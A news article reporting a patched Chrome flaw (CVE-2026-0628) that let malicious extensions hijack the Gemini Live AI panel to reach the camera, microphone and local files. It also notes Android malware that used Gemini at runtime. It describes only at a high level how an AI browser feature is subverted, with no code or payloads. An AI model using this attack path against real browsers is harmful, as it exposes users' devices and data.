Security boffins have discovered a high-severity bug in Google Chrome that allowed malicious extensions to hijack its Gemini Live AI panel and inherit privileges they were never meant to have.

The flaw, tracked as CVE-2026-0628, was uncovered by researchers at Palo Alto Networks' Unit 42 who found that rogue Chrome extensions could manipulate how the browser handled requests to the embedded Gemini Live side panel. By exploiting the way Chrome handles extension network rules, a malicious add-on with fairly standard permissions could intercept and tamper with traffic headed for the Gemini panel, slipping its own JavaScript into a far more trusted part of the browser.

Gemini Live, built into Chrome as an interactive AI panel, isn't just a chatbot bolted onto a tab. It's tightly integrated into the browser to grab screenshots, read local files, and turn on your camera or microphone when asked. That's handy if you're using it as intended, but less so if a sketchy extension manages to ride along and inherit the same level of access, stepping well beyond the permissions add-ons are supposed to have.

"Since the Gemini app relies on performing actions for legitimate purposes, hijacking the Gemini panel allows privileged access to system resources that an extension would not normally have," said Gal Weizman, security researcher at Palo Alto Networks.

In effect, a malicious extension could have turned on a webcam or microphone, sifted through local files, taken screenshots, or slipped phishing messages into what appears to be a legitimate Gemini panel. Nothing particularly fancy was required – just ordinary extension behavior bumping up against a flaw in how Chrome walled off its AI feature.

• OpenClaw, but in containers: Meet NanoClaw
• AI models suck slightly less at math than they did last year
• AIs are happy to launch nukes in simulated combat scenarios
• OpenAI asks its friends to tell their friends about Frontier

Google fixed the bug in early January, shipping patches in Chrome 143.0.7499.192 and 143.0.7499.193 for desktop via a Stable Channel update. The hole was closed before Unit 42 went public, and anyone on a current version is covered. Even so, it's yet another example of how deeply integrating AI features with core software can quietly reshape the browser's threat model.

News of the bug comes after analyst firm Gartner advised most organizations to avoid so-called "agentic" browsers, arguing that AI-driven automation with deep system hooks introduces risks that outweigh the productivity upside for many enterprises.

It also follows fresh evidence that attackers are already experimenting with generative AI inside their tooling. In February, researchers detailed Android malware that tapped Google's Gemini model at runtime to help interpret screenshots and automate on-device actions, showing that criminals are just as keen as vendors to wire AI into sensitive parts of the stack.

For years, browser makers have tried to keep extensions boxed in so one bad download can't poke around your system. Add an AI helper that's allowed to read files and tap your mic on command, and things get messier. This bug is a fairly simple reminder: the more power you give software in the name of convenience, the more careful you have to be about who else might get their hands on it. ®